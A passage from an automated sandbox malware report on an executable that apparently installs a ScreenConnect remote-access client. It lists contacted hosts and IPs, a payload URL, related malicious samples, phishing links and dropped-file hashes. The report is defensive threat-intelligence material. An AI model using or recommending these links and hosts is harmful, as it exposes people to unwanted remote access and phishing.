                                                                                                                                                                      http://Passport.NET/STSsvchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdpC9fPITAsvchost.exe, 00000008.00000003.1534017027.00000189C5F55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 00000002.00000002.2474748099.000001D43EC00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecusvchost.exe, 00000008.00000002.2689020109.00000189C5680000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/Issue502svchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAABGI2aS3asvchost.exe, 00000008.00000003.1534017027.00000189C5F55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      http://www.w3.odfsvc.exe, 00000002.00000002.2493129863.000001D459130000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F166000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F13A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://secure.stansup.com/Bin/ScreenConnect.Client.application#Scre0dfsvc.exe, 00000002.00000002.2495433381.000001D45930D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        http://Passport.NET/tbsvchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1517383417.00000189C5F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2690008650.00000189C642D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1517383417.00000189C5F2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 00000008.00000002.2689297408.00000189C56D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMMsvchost.exe, 00000008.00000003.1469053153.00000189C5F27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsis-2svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                https://signup.live.com/signup.aspxsvchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468602840.00000189C5F2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecu-1.0svchost.exe, 00000008.00000002.2689020109.00000189C5680000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469232936.00000189C5F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 00000008.00000002.2689862516.00000189C5F5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAAsvchost.exe, 00000008.00000003.1517480585.00000189C5F29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://www.xrml.org/schema/2001/11/xrml2coredfsvc.exe, 00000002.00000002.2474748099.000001D43EC00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		unknown

                                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                79.110.49.185
                                                                                                                                                                                                                		secure.stansup.comGermany
                                                                                                                                                                                                                		57287OTAVANET-ASCZfalse

                                                                                                                                                                                                                Private

                                                                                                                                                                                                                IP
                                                                                                                                                                                                                127.0.0.1

                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                Analysis ID:1542314
                                                                                                                                                                                                                Start date and time:2024-10-25 19:26:08 +02:00
                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                Overall analysis duration:0h 8m 17s
                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                Number of analysed new started processes analysed:17
                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                Sample name:khwHsyfsJ1.exe
                                                                                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                                                                                Original Sample Name:89c2a842bb805ce52e078e5f533a1baebb7f608cc963686edecc46a87602662f.exe
                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                Classification:mal66.evad.winEXE@18/77@2/2
                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                • Successful, ratio: 83.3%
                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                • Successful, ratio: 77%
                                                                                                                                                                                                                • Number of executed functions: 271
                                                                                                                                                                                                                • Number of non-executed functions: 30
                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                • Found application associated with file extension: .exe

                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 20.190.159.64, 40.126.31.67, 20.190.159.68, 20.190.159.75, 40.126.31.73, 20.190.159.71, 20.190.159.4, 40.126.31.69, 84.201.210.34, 192.229.221.95, 184.28.90.27, 52.168.117.173, 93.184.221.240
                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, wu.ec.azureedge.net, cacerts.digicert.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                                                • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 4332 because it is empty
                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                • VT rate limit hit for: khwHsyfsJ1.exe

                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                13:27:12API Interceptor1294042x Sleep call for process: dfsvc.exe modified
                                                                                                                                                                                                                13:27:13API Interceptor1x Sleep call for process: khwHsyfsJ1.exe modified
                                                                                                                                                                                                                13:27:15API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                13:27:21API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                79.110.49.185X5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                  AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                    z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                      wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                        3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                          z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                            wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                Iw6bIFfJSu.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  GdVSN8ISU4.exeGet hashmaliciousScreenConnect ToolBrowse

                                                                                                                                                                                                                                    Domains

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    secure.stansup.comX5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    Iw6bIFfJSu.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    GdVSN8ISU4.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    kjh231a.zapto.orgX5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    Iw6bIFfJSu.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    GdVSN8ISU4.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    n1cioOOs7I.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185

                                                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    OTAVANET-ASCZEPCo9k8NIn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    X5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    gunzipped.exeGet hashmaliciousNanocoreBrowse
                                                                                                                                                                                                                                    • 79.110.49.176
                                                                                                                                                                                                                                    z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185

                                                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0exrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    EPCo9k8NIn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    X5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    https://beta.adiance.com/wp-content/plugins/arull.php?7096797967704b5369323074645079557a5054436e4e5379314f7a644d725474524c7a732f564c7a4f4b794d6a574277413dhttps://digidunesen.sa.com/v2Xhk/#X%5Bemail%5DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    SecuriteInfo.com.Gen.Variant.Jaik.244817.4008.28987.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    https://23.245.109.208.host.secureserver.net/E5V7V5K0D7J7U1G8T1M8U3B4G7B4C0&c=E,1,2fln-18Rcg-_y13WFwFZvQn3f1CXlYk0J_eiM8RKZuA6Djx49SsFA5in1hnyQJXLjWW1L6y7WaZ9eFSqcAvQerMcOF3C93rx-F5tfSihNA,,&typo=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    https://8i.eryonficket.com/g60ff/#aGVzc2dyb3VwaW52QGhlc3MuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 79.110.49.185
                                                                                                                                                                                                                                    https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NngTeRowYVzfBggLgr0jnYTDMmRw1imFIm2ET99YaDpZTcYzDf4_j-5YFTogaUxno5U6mNO7vBpPu8_Qjtn233vjPaHL2UbGDlhZQdGA3D25CwqECHxQCRtUKDBEqYowFBHIAzLTnKpBZet0FyIbh36NsUUZbSRWq6o0ZyOmIf1hCVhGuO6UGV5eawzRsIwkKvzidjgnmqdlkZtGukb6XGa_iBxPDbSv-k30p9lo3wdD1QatTUJJEohlFBchxhBckADPJi-N1FZ3iloNeeN8qyMNfc5Ys1judUQjU1gwK5EC2qllcEVWuSrLoChCMIK0bJx3mPJ19_Q6xTN6_Zu96Pc7y6XXfCBdt0HNrv0PBZaGs3DaTjQy2mYbupspnNefrFYvM3J35vc35X37_6zGK5f_2fVvaX7a1xVnPf0z2a5XZydZJdxPiwTRro9fX4wlOTmAb-lz_0effAv103-GQAA__9hXKLJGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 79.110.49.185

                                                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exexrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                      EPCo9k8NIn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                        X5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                          AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                            z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                              wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                  z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                    wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                      3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse

                                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                                        Entropy (8bit):0.4932373033622139
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1Ztac:cJhXC9lHmutpJyiRDeJ/aUKrDgnme
                                                                                                                                                                                                                                                        MD5:CC0970982F8EC1852B0F6197F30634D2
                                                                                                                                                                                                                                                        SHA1:C44DB13A2B44E988D7FB7594B188991F359FFF7D
                                                                                                                                                                                                                                                        SHA-256:A6FE690A444FDAAE66E4A0822A39078334617918E88ECDDF46B7BF7B24D35BEB
                                                                                                                                                                                                                                                        SHA-512:F43F6C709CD8B4DEB7C8F9D6C24529819A8EE90F769685BFF17EA3907266B51738530144A428F8C4AEB50938491B071D5D56E7FAC6FE2723A31A4C206E026E82
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x867a2d70, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                                        Entropy (8bit):0.7217373328847188
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:rSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:razaNvFv8V2UW/DLzN/w4wZi
                                                                                                                                                                                                                                                        MD5:6B2A32A50A32CBF26BE67E71533CDF38
                                                                                                                                                                                                                                                        SHA1:C22086C7691549EDFEECFE90799B842D1085A4B1
                                                                                                                                                                                                                                                        SHA-256:255A7370033F63FE1A07A2B91DD81F8FD3705CD8B2A73A4ED9D428125FF0CADB
                                                                                                                                                                                                                                                        SHA-512:FE9BCED8E438BA894669F8DE6BB849ADC79CE7A776A6223A76F8E5CB736DB549ACF0671672A0E0DFBFDBA8EFAAA30B0668F3DD23BADC8A1E8AD0DA3182707BA1
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.z-p... ...............X\...;...{......................p.D..........{}......|..h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{...........................................|...................l.q.....|...........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                                                                                        Entropy (8bit):0.08153764902110348
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:ke8YedL8/r/fgsCrZClW/tfLall+SHY/Xl+/rQLve:kFzdLmfgs3GNqAS4M
                                                                                                                                                                                                                                                        MD5:1E35809FE435379FFEC8CD9545C0665A
                                                                                                                                                                                                                                                        SHA1:619DCA51D6F1C18FA085AC9E0171380387DD082D
                                                                                                                                                                                                                                                        SHA-256:066608E083B0DFB800AE3532363744D02C3B12C3B6E7E36BFCB5CA59C653F566
                                                                                                                                                                                                                                                        SHA-512:2689656EA79C1486B92579FF592103FD02BC9FC6FD4010CA0CD6AF57FF707BE58C663516719F6F917B40949723B9D841AA21446E6F1BE17975D3B7657644802C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:D..;.....................................;...{.......|.......{}..............{}......{}.vv_Q.....{}..................l.q.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_khwHsyfsJ1.exe_cedc721fedcefff4fd769557be0c6a9fb641d7_026cf9bc_01bbeda8-9df9-431d-b05b-aa7134e7ccfd\Report.wer

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                                        Entropy (8bit):0.911148570773437
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:oKF9O64KZsFhqnGXyf8QXIDcQvc6QcEVcw3cE/jjn+HbHg/Jg+OgBCXEYcI+1sio:7dnZbX0BU/Hjsjq0ozuiFMZ24IO8/o3
                                                                                                                                                                                                                                                        MD5:3EC5D0E14E279AAB8C6C2EE457A514BC
                                                                                                                                                                                                                                                        SHA1:0B252057739DEC6F092287F9E9AD8DC3769F6743
                                                                                                                                                                                                                                                        SHA-256:2C8CADE2284865093120177452E65503AEFED4709B50E3B199588B15B21274EE
                                                                                                                                                                                                                                                        SHA-512:185AD7C7AD5D3E9B2DE14C26D2E69944274922CAC0A4F8D7346BA79398B71CDA0236EF36926526107732F93D39856AFF14D1139EA51CBC2CC7F605CAFFDCE6CA
                                                                                                                                                                                                                                                        Malicious:true
